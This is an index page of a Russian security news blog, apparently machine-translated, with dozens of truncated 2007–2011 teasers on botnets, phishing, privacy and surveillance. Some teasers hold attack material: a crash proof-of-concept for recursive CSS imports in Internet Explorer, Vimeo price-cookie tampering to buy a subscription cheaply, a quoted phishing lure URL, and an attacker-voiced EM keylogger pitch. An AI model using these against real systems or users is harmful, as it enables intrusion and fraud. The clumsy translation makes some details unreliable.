Main » 2011 » Март » 16


Mozilla community once again announced his vision of the anonymity of users on the web. It is possible that in early 2011, Firefox will click "no trace". Anyway, so says Gary Kovacs, executive director of Mozilla Corporation. He also claims that absolutely agree with the statements of many users need to keep the "traces" the web is under control.

Currently, the Mozilla community is also concerned about the methods of online advertising agencies and networks that hook or by crook trying to get any information about the user, in order to provide the most appropriate advertising interests of most users. Clearly, as a result of these actions the company gain more clients, but generally speaking, such methods are already on the verge of a little more and all this can be called theft of information.

Worst of all, the user can not control their own "footprints" on the Internet - the concept of "anonymity of the Internet" is becoming more elusive.

It is interesti ... Читать дальше »
Просмотров: 56749 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (731)



What then, dear habrazhitel, if earlier, you could find all sorts of throwing, working with faceless passers-by in the subway or train station, then more recently they have mastered computers, electronic databases, the color printing industry and other benefits to the computer Mailing name paper as spam and put in your personal mailbox in the entrance designed color brochures and promotional material personally for you (and your parents), indicating all the details, names and other things to ingratiate themselves . What to expect from a well-equipped spammers-throwing? How do they earn and how to protect themselves from them? Consider the following example. (Photo by gently traffic)



So, we got another letter. This is not the first letter of this year. Open it and see.


Envelope Front


Envelope rear

We see a real address and name of the recipient, but noticed immediately that all postage s ... Читать дальше »
Просмотров: 5594 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (19)

Yet this summer - more precisely, in August, it became known that Intel wants to buy anti-virus company McAfee. The transaction value is quite high - $ 7.68 billion. Antimonopolschiki U.S. immediately drew attention to this deal, and began to check its validity, as happens in such cases. By the way, this deal is the largest in the history of Intel.

Corporation has agreed to buy MacAfee to expand its influence in the rapidly growing market segment of network security applications. Today it became known that the Fair Trade Commission has approved the transaction, so it will be completed shortly. However, there is another problem - the European Antimonopolschiki, but often the Europeans waiting for the decision of American colleagues, and then make a similar decision.

Analysts believe that the special problems in treating the transaction by the European legislator should not be so very soon MacAfee actually pass under the top of Intel. Naturally, after the completion of th ... Читать дальше »
Просмотров: 1369 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Famous cryptologist, bestselling author of cryptology, the developer of ciphers Blowfish and Twofish, became interested in human psychology. Bruce Schneier believes that to create good computer security systems need to study the brain of homo sapiens, very carefully - the neocortex and amygdala.

Next week, Bruce Schneier will speak at the RSA conference and talk about their latest research and thinking on the connection between psychology and computer security. Report promises to be quite interesting.

Cryptography guru himself explains that the purpose of his speech will not at all practical methods of cryptography or security of computer data, namely, the arguments about how people think and how they feel about the computer (and not just computer) security. It really is a serious psychological problem worthy of medical investigation.

"A lot of time in RSA we are trying to understand why people do not protect their computers, why they behave so irrationally. This c ... Читать дальше »
Просмотров: 1066 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Where the smoker - there and open the door. Total ban on smoking in offices, forcing dependence on nicotine geek to run into the street. Back door is left open for them. According to British specialists, social hackers can use this "hole".

British consulting firm NTA Monitor, which specializes in IT-security, conducted an experiment. During this experience, a hacker could easily enter the corporate building through a back door, which left specifically for smokers. Inside the building the attacker using social engineering techniques entered the meeting room. Full-time employees of the company held it there and left alone.

To penetrate into the building did not need a hacker to pass. He simply waited for smokers smoke break is over, and then went through the same door. A few minutes later he was able to connect my laptop to the corporate VoIP-network - directly from the meeting room. Fortunately, the company data network has been separated from VoIP-network, so that unauth ... Читать дальше »
Просмотров: 1159 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

This question is currently anyone who has the resources on the Internet that host their own writings (original content).
The same question I started asking myself since the beginning of 2006, when the network began to emerge clones of my work.

The first clone was the menu (which I did for the first version of the portfolio) at the site of one of DJ-I, which is the most insolent manner stole all the menus, do not even bother to change (flashers will understand me), no color masks, no algorithm, no even bugs. In the future, the incident was resolved quite peacefully - by adding my copyright and link to the site.

Next, there were several similar clones of works from my blog, but, frankly, did not want to understand, because attendance of those resources has been a little crazy, and the forces on the proceedings was not - summer is back!

2007 has presented absolutely stunning (to me) a surprise.

March 3. About six o'clock in the evening.
The ICQ ... Читать дальше »
Просмотров: 1137 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (2)

Not so long ago, or rather the beginning of December was the disclosure of a bug in the recursive processing of CSS in different versions of IE. Presented PoC could just drop a browser, but to survive from it of something more meaningful unable to start this week, while in Metasploit does not appear to exploit full exploitation of this vulnerability.

PoC originally looked like:
<code>
<div style="position: absolute; top: -999px;left: -999px;">
< link href = "css.css" rel = "stylesheet" type = "text / css" />
</ code>

<code of css.css>
* {
color: red;
}
@ import url ("css.css");
@ import url ("css.css");
@ import url ("css.css");
@ import url ("css.css");
</ code>

error is damaged memory in the parser of HTML pages (mshtml.dll) in the processing of pages containing recursive include CSS object CStyleSheet:: Notify removed and later this memory area can be used to transfer control to arbit ... Читать дальше »
Просмотров: 1150 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Attack on Rutaceae DNS-servers, recorded in early February, possibly the kind of advertising action. "Advertisers" demonstrated its potential in the organization of large-scale attacks using botnets. This version put forth in a special document, the representatives of ICANN - the organization for the purpose of domain names, website Darkreading.com.

With what version of the advertising campaign looks very interesting, agrees CEO of OpenDNS DNS-service and EveryDNS Ulevich David (David Ulevitch): «ICANN representatives have suggested that this could be someone trying to demonstrate the power of his boat networks and the ability to use their custom. This is not about attacking the test in preparation for global action against themselves DNS-servers, and a way to demonstrate the potential of bot-nets to those who can use this potential against less protected targets. " According to Ulevich, a new similar attack is possible, but it is unlikely to destabilize the operation of servers ... Читать дальше »
Просмотров: 1056 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

The company EM-SEC Technologies of North Carolina issued a press release, which said on successful tests of the material, developed its technology division. EM-SEC 2060, was named as the originator, is a special paint that is being deposited on the walls of rooms or buildings, screens it from the electromagnetic radiation of wireless communication: cellular or, for example, Wi-Fi.

A key component coating EM-SEC 2060, which in appearance and properties differs little from the usual vodoemulsionki - a complex polymer formula and manufacturing technique which, for obvious reasons, is a commercial secret.

Coverage is intended primarily for information security-critical parts (SCIF) private companies and public (including military) structures. Methods of industrial espionage, not to mention the spying "real" long can intercept information, even from cable networks, and so the theft of data from channels Wi-Fi and does become a kind of urban legend, horror stories for IT-Schnic ... Читать дальше »
Просмотров: 1028 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

ShmooCon hacker conference this year were pleased with an arsenal of unusual devices that could be operated directly by visitors. That there is only a device Silica-based Nokia N800 - it automatically scans the surrounding Windows-computers via WiFi, reveals a vulnerable PC and allows you to take screenshots from any of them in a couple of mouse clicks (and not just screenshots).



Gadgets Silica sold for $ 3600 and fly like hot cakes, according to the developers of the company's Immunity. The price includes the base unit Nokia N800, and pre-configured set of programs, updated for the year ahead and two-hour course on using the device.

"Wireless hacker" can be very useful WiFi signal amplifier from the company WarDrivingWorld.com, with which you can connect to the hotspot as much for three miles. Package worth $ 325 includes a 100-millivattnuyu card 802.11 b / g, 500 millivattny amplifier and antenna 9 dBi.



Among the exhibits you could find a device t ... Читать дальше »
Просмотров: 1029 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Describing the application Wikileaks app in the Apple Store, I promised to translate the customers $ 1 to each sales SKU (instance) a charitable payment to support a free Internet.

One Dollar For Internet Freedom

Internet democracy requires funds to stay strong. By purchasing the Wikileaks app, you donate one dollar of the purchase price towards organizations that work to promote the future of online democracy.
Your donation may be used to fund defense costs of high profile individuals in the event they will be charged for espionage or crimes related to the leakage of confidential documents.
The Wikileaks app and its designers operate independently of Wikileaks and Apple.


Money from Apple I did not get, but to complete the experiment, decided to carry out charitable transfers from their own funds.

In the comments to this article on Habre received a proposal from habrayuzera SMiX check the translation through the



How it managed ... Читать дальше »
Просмотров: 803 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (1)

Once in early February 2011 in Lente.Ru was reported detained in the Netherlands twelve Somali illegal immigrants on charges of planning terrorist attacks, some readers were concerned about the mention of technology arrest: It was in fact publicly declared that the officers received information about the status of illegal immigrants in using GPS-modules in cellphones, sending to the telephone numbers of illegal immigrants a message that was processed without the knowledge of the owners of cellphones, followed by mobile phones (again, unbeknownst to the owners) will automatically send an SMS showing the location of vehicles. Judging by the fact that the detentions were made in seven different places, this technology was supposed to work in seven mobiles (with a maximum of twelve), so it certainly is widespread.

Appears:

1) With the SMS-Centre, legally connected to the global network of SS7, with a simple MAP-query, and knowing only a phone number, you can find and IMSI (nu ... Читать дальше »
Просмотров: 1007 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

In the hacking competition for the maximum number of zombie PCs controlled by leaders bots Sdbot and Gaobot. As reported by antivirus company PandaLabs, the two specified bot responsible for 80% of all new infections in the I quarter. 2007. With a large gap from the leaders follow Oscarbot, IRCbot and RXbot.

"The reasons for this dominance lie not so much in any special properties of Gaobot or Sdbot, but simply that their code is the most prevalent on the Internet - explains Luis Corrons, technical director of PandaLabs. - This means that any criminal who wants to make a bot can simply take the source code for these threats and make any changes of your choice. Indeed through this saves them time and effort. "

Bots - it's worms or Trojans that install themselves on computers to automatically perform certain actions such as sending spam, and then turn computers into "zombies." Botnets - networks of computers infected with bots have become a lucrative business model. There i ... Читать дальше »
Просмотров: 714 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

The Philippine Government filed an appeal to hackers to break in an online vote. This system will be tested during the trial of elections from 10 to 30 July. The Philippines and some other countries are trying to emulate the success of Estonia, which is the world's first fully-fledged Internet-held elections.

The system of online voting for the Philippines was developed by Spanish company Scytl Consortium at a cost of $ 452 thousand during the testing of 26,893 registered voters will be answering questions on-line questionnaire, which should mimic the process of selecting candidates for these elections.

The developers of the system, and Philippine authorities have asked the International Organization of electoral systems with a request to bring to the online testing system "professional hackers."

The Spaniards are confident that their development is completely secure and will withstand any attack. The computer system now being introduced also for online voting in ... Читать дальше »
Просмотров: 687 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Hacker nick Zoz spoke at a conference Defcon 18 with 20-minute story about how he was able to detect the desktop stolen a year ago. The story is really unusual (presentation slides, video (see 3:15)).

Zoz months of dogged, when somewhere in the auction will completing its serial numbers, but to no avail. Account of service DynDNS (dynamic binding domain to the IP-address) are also no signs of life. After 30 days they sent a letter saying that if you want to keep your account in the mode of inactivity, you need to buy an upgrade to version Pro. In October 2009, Zoz did it - and Luck turned in his face.

May 7, 2010 at DynDNS account appeared strange record.



Zoz made the request to the DNS ...



then successfully logged into your own computer by SSH.



Next began the most interesting. At its native desktop Mac OS X, he immediately discovered a few new files and folders. It was a game Realm of Warfare, files an application for unemploy ... Читать дальше »
Просмотров: 795 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

German scientists have learned with the help of sophisticated computer algorithms to recover deleted files and shredders have decided therefore to recover classified documents of the secret police of East Germany.

When the Berlin Wall fell in 1989 and it became clear that the regime of East Germany finished Stasi employees with Shredder tried to destroy all human intelligence materials.

About 16,250 bags containing about 45 million shredders destroyed documents were found and confiscated after the reunification of Germany in 1990. Work to restore the documents began 12 years ago, but 24 people were able to recover the contents of only 323 sacks. With such rates would restore all the documents 30 people would be engaged from 600 to 800 years.

The researchers hope that they can recover documents from 400 bags for 2 years, using new computer technology, proposed by the Fraunhofer Institute.

If the search project in which the state has allocated $ 8.53 million, ... Читать дальше »
Просмотров: 691 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

In the yard - in 2007, and the malicious software is already in the last year reached a record level of growth and technological sophistication. Many of us on his experiences have been exposed to spyware, viruses, worms and other malicious programs, and therefore wisely decided to take the appropriate steps to protect themselves.

Even those who escaped infection, is seriously resort to measures to ensure safety on the Internet. Everyone needs a reliable protection, covering as much as possible areas of risk and ability to protect your network, while not hindering the work.

But where to focus your search for security - for antivirus, firewall, integrated solution, or something else? Agnitum talks about how to choose the best combination of tools to counter modern threats. An article for the newsletter "In the world of security" was written to help you make informed choices, with short videos and simple descriptions, we show how modern malware infects a computer, and show ... Читать дальше »
Просмотров: 669 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Very controversial law adopted on Monday the German Bundestag deputies. Following the path of gradual tightening of articles of the Criminal Code against cyber-crime, legislators have made yet what feared among the experts on information security - a serious went too far in imposing bans and almost completely erased the line between "white" and "dark" parties to the computer underground.

It is quite reasonable position on the illegality and criminal liability of any action to circumvent protection of information by unauthorized persons is complemented by the new rules confusing ban on development, reproduction, distribution, installation and use of any software that can be used for these actions. That is now in Germany can not test durability of the security without the risk of thunder in jail.

Law, according to specialists, it is as foolish as the law against the acquisition and use, such as forks. They also can cause serious harm to humans (and at a certain skill - and ... Читать дальше »
Просмотров: 654 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)



This is the right of the U.S. president really is, and most unusual in this whole situation is that these rights are granted Congress leader of the country at a time when the Internet or computer networks, no one dreamed of. The fact that in 1942 Congress granted the right U.S. president to manage telephonic or telegraphic networks in the event of a "difficult" situations that threaten national security. The wording of the law we see that it is relevant to almost any means or centers of wire communications. This summer, the administration of current U.S. president said that he was going to take almost forgotten the law in the event of an emergency.

Some analysts have even decided that the president could in one fell swoop "disable" Internet that other experts think clearly nonsense. Nevertheless, the U.S. Congress is going to take away from the president the right to manage computer networks, as they say, away from sin. "

In principle, now the U.S. government fin ... Читать дальше »
Просмотров: 647 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Security experts have discovered new evidence of the war being waged between a botnet owners Srizbi and the Storm Worm. Like a mafia groups from "The Sopranos", the hackers made a redistribution of spheres of influence. The only difference is that the criminals from the virtual world are struggling for control over the tens of thousands of infected computers and is used in this war, not machines, and Trojans.

Trojan called Trojan.Srizbi, part of the combat kit MPack - the latest addition hacker weapons. It not only infects the computer and makes it part of a botnet, but also tries to destroy its main competitor - another trojan Storm Worm.

This is another episode in the war between the two botnets. More recently, the bots from the network Storm Worm «ddos" production server Srizbi, which was used to spread malware. The server has been put out of action for the day. Security experts have observed for this attack and said that during the day could not get through to him, to ... Читать дальше »
Просмотров: 768 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)



Situation where one spouse is reading SMS or e-mail of another, is almost normal - refers to cases where the husband or wife to suspect each other of treason, and try to verify this by looking at "discrediting". There are hundreds if not thousands of anecdotes about such situations and, in general, society does not consider such cases something out of the ordinary. And here in the U.S. Ceychas is an interesting trial, a decision which may be the same judicial precedent. The situation is completely anecdotal, if not complete its severity.

The accused, 33-year-old Leon Walker, regularly read e-mails his wife, having learned the password from her account in Gmail. We have to think that the big problem is to find out the password from the email, instant messenger or social networking account of its second half there. Walker waited until the wife leaves the house and sat down to check her email. In the end, his wife noticed something was wrong, a scandal, and not just - it we ... Читать дальше »
Просмотров: 1941 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Not only Apple, AT & T and accessory makers have all the amenities of hype around the iPhone. Virus writers and scammers, too, have found a way how you can profit from this situation. They have already managed to create a botnet of users who wanted to buy himself a new "wonder device" from Apple.

Company PandaLabs has detected this week botnet of 7.5 thousand computers (the number is constantly growing), infected with a trojan called Aifone.A. PC users who tried to buy an iPhone from the site iphone.com, owned by Apple, to be forwarded to a fake site that mimics the site iPhone. If users have ordered the iPhone through the dummy site, the information about the bank or credit card fell into the hands of fraudsters.

"This is one of the most sophisticated attacks aimed at specific community, this time for buyers iPhone», - said the technical director of PandaLabs Kerrons Lewis (Luis Corrons). - "It's really complex, dangerous attack that combines elements of malware (tro ... Читать дальше »
Просмотров: 668 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Specialists have reported unusual behavior of Windows XP and Vista in recent days. Some of them are on the team in the middle of the night began to update the system files to bypass the traditional process avtoapdeyta. And the files are updated, even if the system is turned off Automatic Updates. Program Windows Update (WU) has assumed all powers and without any dialogue with the user independently replaced nine files.

Generally speaking, this is a very meaningful event. If Microsoft would make compulsory procedure for updating the standard, we need to review the entire security strategy for personal computers. This self-updating PC is not entirely controlled by his master.

Of course, Microsoft does this for security of the users, but is relevant to users as a herd of sheep rather insulting. In addition, implementing such a procedure global updating systems in a homogeneous environment, the company itself becomes a source of potential danger.

Under OS XP SP2 update ... Читать дальше »
Просмотров: 740 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

One winter morning a colleague said that in various browsers on a page Presenting Vimeo Plus, shows a different value of the subscription. It was $ 49.95 and $ 59.95. Immediately suspicion crept in, why is it so strange marks Vimeo annual subscription. While in my car all browsers show the same amount.

After a little research, we realized that the price is stored in a cookie named 5vimeo_cart:

% 7B% 22item_class% 22% 3A% 22AccountFeatures% 22% 2C% 22user_for% 22% 3Anull% 2C% 22item_identifier% 22 % 3A1% 2C% 22name% 22% 3A% 22Vimeo + Plus% 3Cimg + src% 3D% 27% 5C% 2Fassets% 5C% 2Fimages% 5C% 2Ficon_plus_tiny.png% 27% 5C% 2F% 3E% 22% 2C% 22cost % 22% 3A59.95% 7D

reasons for such different amounts of affixing not been elucidated. As an experiment, decided to try to put the value and try to buy a subscription for one year. Just for this was an appropriate card with $ 4 per account (had nothing to lose, you still would not have removed more). Change the ... Читать дальше »
Просмотров: 713 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Just received the following letter:

Dear Customer,

According to paragraph 4.6.2.5. Terms of Use Yandex.Money, your account is blocked.
Need an account reactivation in the system.

To reaktsivatsii follow this link: https: / / money.yandex.ru / login.html

or contact one of our operators:
PS Yandex LLC. 101000, Moscow, st. Vavilova, 40
tel.: +7 (495) 739-23-25 ??
PS Yandex LLC, St. Petersburg branch. 191123, St. Petersburg, ul. Radishchev 39, tel.: +7 (812) 334-7750

Letter generated automatically, do not respond
Best regards, PS Yandex

Letter sent in HTML format . If you click on a link you get to the page: http://pornos-de.com/money.ya.ru/Index.h ..., which is a replica of the main page of Yandex. In no case do not enter their data.

Be careful.

If you access this page FireFox warns that this is a dangerous page. Apparently the good people have already noted the site as potentially dangerous for users. By the wa ... Читать дальше »
Просмотров: 807 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Translation of an article from the site rootkit.com

Preamble

Kaspersky Anti-Virus - one of the most technically advanced anti-virus today. It can even deal with certain types of viruses, even when they were alive and trying to attack.

He has a proactive defense module (Proactive Defence), representing a partial implementation of HIPS, is capable, in theory, help protect your computer from unknown threats by analyzing program behavior and preventing unauthorized actions.

This is all theory and advertising slogans. In reality, we have a very different situation. There are many viruses, which do not show anti-virus, and its proactive protection can be suppressed so that an attacker can download your driver, then any proactive protection simply useless.

This article - not just a review of errors and vulnerabilities - at the end of each part, we give advice to developers antivirus, because we see that they can not deal with these mistakes yourself. ... Читать дальше »
Просмотров: 831 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

As reported by Associated Press, on Monday, Donald Kerr (Donald Kerr), since October was the Director of National Intelligence in the Office of the President of the United States, said that society needs to reconsider the definition of such an important democratic freedom as privacy. "Privacy no longer can mean anonymity," said Carr, adding that protection against ingress of correspondence and financial information to citizens in improper hands should not engage themselves and the government and business. Of course means that the hands of the CIA and NSA to improperly do not apply.

The discussion was again raised in the U.S. Congress during a re-consideration of amendments to the Act on the Supervision of foreign intelligence (FISA), which for several months trying to push through the Bush administration. Amendments are needed for its extension of the almost unlimited powers, which were issued to U.S. "security officials" in the famous USA PATRIOT Act after the attacks of Septem ... Читать дальше »
Просмотров: 649 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

The most secure network of anonymous servers, Tor was not such secure. Two months ago in Sweden a scandal erupted when it became aware of the deed of a well-known consultant on IT-security, 22-year-old Dena Egerstada (Dan Egerstad). He made a traffic filtering Tor and posted on his blog logins and passwords to mailboxes and servers belonging to the embassies of countries, NGOs, commercial firms and government agencies in different countries. Among the victims - the Embassy of India, Russia, Uzbekistan, Kazakhstan and Iran, as well as the British representative in Nepal. Anyone could go to read a post on these accounts.

That article became a sensation. Now the story gets its development. On a tip from U.S. authorities Swedish police shut down blog Dehn, searched his apartment and confiscated equipment, and him after two hours of interrogation were released. Dan is still at large and giving interviews, explaining his position. He sure has not violated any laws, but it already seem ... Читать дальше »
Просмотров: 683 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

German police could not intercept and decipher Skype traffic for wiretapping phone calls of suspected criminals and terrorists. At the annual meeting of representatives of law enforcement and security professionals at this complained to reporters Zirka Joerg (Joerg Ziercke), president of the National Police headquarters in Germany (BKA), according to Reuters.

This situation is not satisfied with the police, for which wiretapping phones long ago became a standard tool for rapid development. Naturally, the security forces are not going to abandon such an effective tool and are now looking for a way out of this situation.

Experts say VoIP-telephony by its nature more difficult to intercept because the information is transmitted as packets through the network to an unpredictable route, rather than fixed lines, as in conventional telephony.

Joerg Zirka said they did not seek the leadership of Skype to ask for help in solving this problem. "I do not think it will help" - ... Читать дальше »
Просмотров: 645 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

The article deals with one of information security issues - the fight with successive deliveries, which are also called "chain letters" in honor of the handwritten pattern. The first such message, entitled "Celestial" or "holy letters» (Himmelsbriefe) appeared in the Middle Ages. However, we will not digress from the topic and consider the threat of "chain letters" from the perspective of Information Security:

The hidden danger "" chain letters "and similar successive mailings



To many it is understandable that the data distribution provide the parasite load on corporate equipment and communication channels. This is indeed the case, however, is not the biggest danger: the creation of such a chain is one of the mechanisms to obtain accurate database of addresses by spammers. An even greater danger lies in the "illumination" of the staffing structure of enterprises, which allows attackers to use this information in a variety of purposes. But the biggest risk at all ... Читать дальше »
Просмотров: 797 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Such malicious hakeryuga like you, of course, not once spoken to software keyloggers. Run once this program from the enemy - and you're done: all the passwords and typing, you can assume you have already. However, this approach has a drawback: you have to somehow start cFosSpeed ??on another computer that is not always possible. Therefore, we decided to make the elementary device with which you can easily benefit from logging all the typing, just coming closer to a computer enemy.

The essence of the ideas and methods
briefly explain what will be discussed. All tokopotreblyayuschie device, be it television, mouse, keyboard, hard drive or cooler during operation creates in the surrounding electromagnetic field. His appearance, as we know from physics course is directly related to a current of different voltage passing through the wires and channels of printed circuit boards. The magnitude of these electromagnetic waves can be measured by special devices. Field often crea ... Читать дальше »
Просмотров: 598 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

National Laboratory, Oak Ridge (ORNL) has undergone a complex and subtle attacks over the Internet, admits its Director Tom Mason (Thom Mason). Attackers acted in a very sophisticated way: the fake email with malicious attachments were sent to several people whose computers have a connection with both the World Wide Web, and from internal networks lab. One wrong action - and the burglars gained access to a database of all who have been in Oak Ridge for 14 years starting from 1990.

After receiving and analyzing this information, hackers have begun to send targeted letters "weak link" in defense laboratory - the people have a fairly high level of access to the LAN from your computer. Made about 1,100 attempts, while applying 7 different versions of letters, almost indistinguishable from conventional internal correspondence, they have ensured that "at least 11 employees" engaged dangerous attachments and give them access to even deeper secrets of hidden laboratory.

How serio ... Читать дальше »
Просмотров: 606 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)


Did you know that January 29 to February 5, 2008 ROCIT and Microsoft
hold Safety Week Runet?

Maybe I'm a bit late with his notes, but the summary of the action, consisting of 2 main parts, all the same to say.

So, opened the "Safety Week Runet press conference and round table
" Internet for Children: Prospects and threats? .. "
, Held at the RIA-Novostyah.Veli Roundtable Ilmira Malikov and Sergey Plugotarenko. During the events discussed:
  • Role of society and the state in ensuring the safe use of the Internet for children
  • Ensuring the safety of children on the Internet, software solutions, specialized Internet portals
  • International experience against malicious content and its impact on children
  • Health and safety of children on the Internet: understanding the problem or the solution?
  • International experiences and approaches of limiting children's access to harmful Intern ... Читать дальше »
Просмотров: 645 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Chris Rowland (Chris Rouland), one of the leaders of IBM Internet Security Systems, division of Blue Giant, is looking for and combating threats to information security, said that his colleagues from other companies of the same profile of deliberately hiding information about the vulnerabilities they found. He shares his findings strange statistics have revealed in the preparation of the annual report of X-Force. In 2007, the report said, for the first time in 10 years was found in 5.4% fewer gaps in the protection of computer systems than in the previous year.

Rowland believes that there are developed a black market for vulnerabilities that computer security experts are sold as criminals, and by the authors of the software. And the last goal as clear as in the first place: no one wants to risk their reputation and do not want to draw attention to their miscalculations, preferring to quietly fix them. High profitability of such a "business model" for research firms makes it virt ... Читать дальше »
Просмотров: 567 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

According to experts on network security company McAfee, in 2011 hackers will pay maximum attention to mobile devices, sokraschatelyam URL, geolocation services such as Foursquare, plus the products Apple, which for the time hackers almost never touched. "Social services, mobile web applications become more popular, which makes them very attractive to hackers," - says Vincent Weafer, vice president of McAfee Labs.

In principle, the prediction of experts from McAfee is quite logical - of Internet services, mobile software, Soup themselves are becoming better and smarter, gathering functional. Members of all, it also becomes more and more, and attackers can not simply pay no attention to such a wide field of activities. Same sokraschateli URL - who would have thought that they might be interested in intruders? However, today it is one of the most popular tools for criminals.

According to the same experts, social networks will remain hot "theme" of network intruders, but the ... Читать дальше »
Просмотров: 529 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Before you read this article would recommend to get acquainted with the basic terms of the technology http://ru.wikipedia.org/wiki/BitTorrent
also desirable basic knowledge of the language Perl

Today Bittorrent protocol is at its peak of popularity. Hundreds and thousands of terabytes per second rushing to peers over fiber optic backbones and radio channels. Millions of files (torrent) appear on the tracker. What can prevent this?

In this article I want to discuss and show excessive openness and ease of messaging tracker and bittorrent client. Maybe this vulnerability can not be named because real threat to the server and the client does not, but it can undermine the functioning of the network and dramatically reduce the overall rate of return. It's no secret that an indicator of user activity tracker is a ratio. It is less than the greater restrictions imposed on the user. Very low ratio may serve as deleting the account. This is especially important in networks usin ... Читать дальше »
Просмотров: 10005 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (9)

Today I wrote to my old friend and asked the institute to lend him money. Under the cut - History of the ICQ (Ivanov - he, Tony Clifton - I). Nothing new in this, but still beware ...


Ivanov (17:06:00 6/03/2008)
hello, webmoney in debt do not?

Tony Clifton (17:06:17 6/03/2008)
Che-ta lately all they want from me webmoney

Ivanov (17:06:29 6/03/2008)
:-) lend? Saturday will return ,25-30 VSW

Tony Clifton (17:08:21 6/03/2008)
VSW not - there is only WMR and Yandex

Ivanov (17:11:15 6 / 03/2008)
GIR skinesh ? 1000 should be about 900 rubles

Tony Clifton (17:11:27 6/03/2008)
1000 should be about 900 rubles? how much do you need money?

Ivanov (17:11:40 6/03/2008)
1000 skinesh?

Tony Clifton (17:11:47 6/03/2008)
I, and 1000
a purse?

Ivanov (17:12:04 6/03/2008)
R420344696559

Tony Clifton (17:13:02 6/03/2008)
What was the name of teaching math at 1 year? name

Ivanov (17:13:18 6/03/200 ... Читать дальше »
Просмотров: 648 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

At Georgia Tech have developed a prototype program BotSniffer (research work in PDF), which alone is capable of finding botnets, analyzing network activity of individual computers on the network. The program identifies patterns that are characteristic for infected zombie PCs, and then introduced them to the network and goes to the management server (C & C) botnet. Typically, the management server runs through IRC or HTTP, and BotSniffer supports both modes.

BotSniffer does not need a signature-based or IP-address list, to get started. It detects bots and finds C & C-servers, even if the traffic between them is encrypted. The fact that all the bots exhibit the same behavior. At the same time, they simultaneously begin to or send information, or to scan the network. The program determines these patterns. Then you can quickly block the transmission of commands over the network, that is to neutralize this paper. The researchers explain that the mechanism of transmission of ... Читать дальше »
Просмотров: 1199 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

At the Black Hat conference was shown a new method of cracking encryption GSM, which is characterized by simplicity and cheapness. Requires equipment costing only $ 1000 and about half the time to decode the signal and the selection keys.

Thanks to the work of two young specialists David Halton and Steve Mueller soon remote wiretapping GSM-phone will be available not only for intelligence, but also for every citizen. The inventors have used long-known vulnerability in the standard protocol. According to Mueller, the protection of GSM has been broken in 1998 when they were published theoretical papers on this topic. They are easy to implement in practice "exploit".

In March of this year, Hulton and Muller are planning to launch a quick version of his spy system that would break the protection in just 30 seconds. True, such a system will cost at least $ 200 thousand Hulton and Muller has defended the design patent.

For comparison, currently special services for the p ... Читать дальше »
Просмотров: 609 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Anti-virus companies have reported a new trend in the spread of viruses. After a wave of e-mail and script viruses is now one of the most popular ways to spread malicious programs are USB-Stick. This was made possible thanks to the weakness of Windows, which by default will automatically launch the autorun.inf file from the removable drive.

For the first time viruses that spread in this way (via INF / Autorun), have shown themselves in June 2007, when statistics ESET Software (developer of NOD32), their share rose to 2.17% of the total number of registered viruses. To date, that is just nine months, the number of viruses has increased to 10,3%.

Among the most popular viruses in March 2008 includes generator popup Win32/Adware.Virtumonde (distributed via USB-sticks), which is very difficult to remove, as well as Mebroot, using the classic technique of recording in the MBR and store data in sectors hard disc, but not in the files, which complicates its detection, even when ... Читать дальше »
Просмотров: 598 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

Quite strange things are happening now, dear. Looked at the statistics recently one of his projects "Reytinge@Mail.ru" and came across this interesting thing here is:



scratched his head, thought a little - well thought, well a few bugs left, well, happens. But then curiosity leaped, and I climbed up to watch the open statistics neighbors ...



Finally, after ten minutes of surfing, I realized that such a request has almost all its neighbors in the rankings, almost all of my side projects, and projects my friends. Kopnuv deeper, it turned out that I got out in the statistics not only left requests, but to a page that has all smacks of delusions:



The link that I found, as time is a site offering the sale of licenses for JBC v3 and SPAM DirectMailer. In tech support suggested that the resource owner to put myself, my counter, but so? Why would a site whose daily attendance significantly higher attendance of my small candle factory, my counter?
... Читать дальше »
Просмотров: 620 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (1)

This information is habratopik for thought for users of the popular client-downloader FlashGet. Apologize for the lack of job options, but something Habr buggy.

To search for UFOs Malvar and control it I use the products of the company Symantec. And just yesterday I have a problem with the fact that the NIS was matyukatsya on FlashGet. I searched a bit online and as a result summarizes:
